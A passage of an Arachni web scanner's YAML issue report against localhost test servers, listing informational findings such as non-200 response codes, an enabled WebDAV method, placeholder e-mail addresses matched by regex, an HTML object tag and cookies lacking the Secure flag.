        Server: thin 1.4.1 codename Chromeo
    id: "Code: 407"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 407"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "407356"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/407
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/408
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 408"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 408"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4081740"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/408
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/409
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 409"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 409"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4097567"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/409
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/410
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 410"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 410"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4101971"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/410
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/412
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 412"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 412"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4123765"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/412
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/413
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 413"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 413"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4135889"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/413
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/414
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 414"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 414"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4143632"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/414
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/415
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 415"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 415"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4157686"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/415
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/416
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 416"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 416"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4166554"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/416
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/417
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 417"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 417"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4178466"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/417
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/418
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 418"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 418"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4184520"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/418
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/420
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 420"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 420"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4209019"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/420
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/422
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 422"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 422"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4222386"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/422
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/411
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 411"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 411"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4113497"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/411
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/423
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 423"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 423"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4231601"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/423
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/424
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 424"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 424"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4246122"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/424
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    WebDAV is enabled on the server.
        Consider auditing further using a specialised tool.
  elem: server
  internal_modname: WebDav
  method: OPTIONS
  mod_name: WebDav
  name: WebDAV
  references: 
    WebDAV.org: http://www.webdav.org/specs/rfc4918.html
    Wikipedia: http://en.wikipedia.org/wiki/WebDAV
  remedy_guidance: Disable WebDAV if not required. If it is required, perform an audit using specialized tools.
  severity: Informational
  tags: 
  - webdav
  - options
  - methods
  - server
  url: http://localhost:6822/
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      WebDAV is enabled on the server.
          Consider auditing further using a specialised tool.
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Allow: STUFF, PROPFIND
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: WebDav
    method: OPTIONS
    mod_name: WebDav
    name: WebDAV
    opts: 
      :element: server
      :regexp: ""
    references: 
      WebDAV.org: http://www.webdav.org/specs/rfc4918.html
      Wikipedia: http://en.wikipedia.org/wiki/WebDAV
    regexp: ""
    regexp_match: 
    remedy_guidance: Disable WebDAV if not required. If it is required, perform an audit using specialized tools.
    response: Content-TypeAllow
    severity: Informational
    tags: 
    - webdav
    - options
    - methods
    - server
    url: http://localhost:6822/
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: An e-mail address is being disclosed.
  elem: body
  internal_modname: EMails
  method: GET
  mod_name: E-mail address
  name: Disclosed e-mail address.
  references: {}

  remedy_guidance: |-
    E-mail addresses should be presented in such
                        a way that it is hard to process them automatically.
  severity: Informational
  tags: []

  url: http://localhost:9244/1
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: An e-mail address is being disclosed.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "17"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: EMails
    method: GET
    mod_name: E-mail address
    name: Disclosed e-mail address.
    opts: 
      :regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
      :match: john@foo.blah.com
      :element: body
    references: {}

    regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
    regexp_match: john@foo.blah.com
    remedy_guidance: |-
      E-mail addresses should be presented in such
                          a way that it is hard to process them automatically.
    response: john@foo.blah.com
    severity: Informational
    tags: []

    url: http://localhost:9244/1
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: An e-mail address is being disclosed.
  elem: body
  internal_modname: EMails
  method: GET
  mod_name: E-mail address
  name: Disclosed e-mail address.
  references: {}

  remedy_guidance: |-
    E-mail addresses should be presented in such
                        a way that it is hard to process them automatically.
  severity: Informational
  tags: []

  url: http://localhost:9244/2
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: An e-mail address is being disclosed.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "23"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: EMails
    method: GET
    mod_name: E-mail address
    name: Disclosed e-mail address.
    opts: 
      :regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
      :match: john32.21d@foo.blah.com
      :element: body
    references: {}

    regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
    regexp_match: john32.21d@foo.blah.com
    remedy_guidance: |-
      E-mail addresses should be presented in such
                          a way that it is hard to process them automatically.
    response: john32.21d@foo.blah.com
    severity: Informational
    tags: []

    url: http://localhost:9244/2
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: An e-mail address is being disclosed.
  elem: body
  internal_modname: EMails
  method: GET
  mod_name: E-mail address
  name: Disclosed e-mail address.
  references: {}

  remedy_guidance: |-
    E-mail addresses should be presented in such
                        a way that it is hard to process them automatically.
  severity: Informational
  tags: []

  url: http://localhost:9244/3
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: An e-mail address is being disclosed.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "38"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: EMails
    method: GET
    mod_name: E-mail address
    name: Disclosed e-mail address.
    opts: 
      :regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
      :match: a.little.more.unusual@dept.example.com
      :element: body
    references: {}

    regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
    regexp_match: a.little.more.unusual@dept.example.com
    remedy_guidance: |-
      E-mail addresses should be presented in such
                          a way that it is hard to process them automatically.
    response: a.little.more.unusual@dept.example.com
    severity: Informational
    tags: []

    url: http://localhost:9244/3
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: An e-mail address is being disclosed.
  elem: body
  internal_modname: EMails
  method: GET
  mod_name: E-mail address
  name: Disclosed e-mail address.
  references: {}

  remedy_guidance: |-
    E-mail addresses should be presented in such
                        a way that it is hard to process them automatically.
  severity: Informational
  tags: []

  url: http://localhost:9244/0
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: An e-mail address is being disclosed.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "14"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: EMails
    method: GET
    mod_name: E-mail address
    name: Disclosed e-mail address.
    opts: 
      :regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
      :match: tasos@blah.com
      :element: body
    references: {}

    regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
    regexp_match: tasos@blah.com
    remedy_guidance: |-
      E-mail addresses should be presented in such
                          a way that it is hard to process them automatically.
    response: tasos@blah.com
    severity: Informational
    tags: []

    url: http://localhost:9244/0
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: Greps pages for HTML objects.
  elem: body
  internal_modname: HTMLObjects
  method: GET
  mod_name: HTML objects
  name: Found an HTML object.
  references: {}

  severity: Informational
  tags: []

  url: http://localhost:8058/
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: Greps pages for HTML objects.
    elem: body
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "73"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: HTMLObjects
    method: GET
    mod_name: HTML objects
    name: Found an HTML object.
    opts: 
      :regexp: (?mi-x:<object(.*)>(.*)<\/object>)
      :match: " width=\"400\" height=\"400\" data=\"helloworld.swf\""
      :element: body
    references: {}

    regexp: (?mi-x:<object(.*)>(.*)<\/object>)
    regexp_match: " width=\"400\" height=\"400\" data=\"helloworld.swf\""
    response: "        <object width=\"400\" height=\"400\" data=\"helloworld.swf\"></object>\n"
    severity: Informational
    tags: []

    url: http://localhost:8058/
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "200"
  cwe_url: http://cwe.mitre.org/data/definitions/200.html
  description: |-
    The logged cookie is allowed to be served over
        an unencrypted channel which makes it susceptible to sniffing.
  elem: cookie
  internal_modname: InsecureCookies
  method: GET
  mod_name: Insecure cookies
  name: Insecure cookie
  references: 
    SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag
  remedy_guidance: Set the 'Secure' flag in the cookie.
  severity: Informational
  tags: []

  url: http://localhost:10598/
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "200"
    cwe_url: http://cwe.mitre.org/data/definitions/200.html
    description: |-
      The logged cookie is allowed to be served over
          an unencrypted channel which makes it susceptible to sniffing.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Set-Cookie: 
        - cookie=value
        - cookie2=value2
        - cookie3=value3; secure
        - cookie4=value4; secure
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: 
    internal_modname: InsecureCookies
    method: GET
    mod_name: Insecure cookies
    name: Insecure cookie
    opts: 
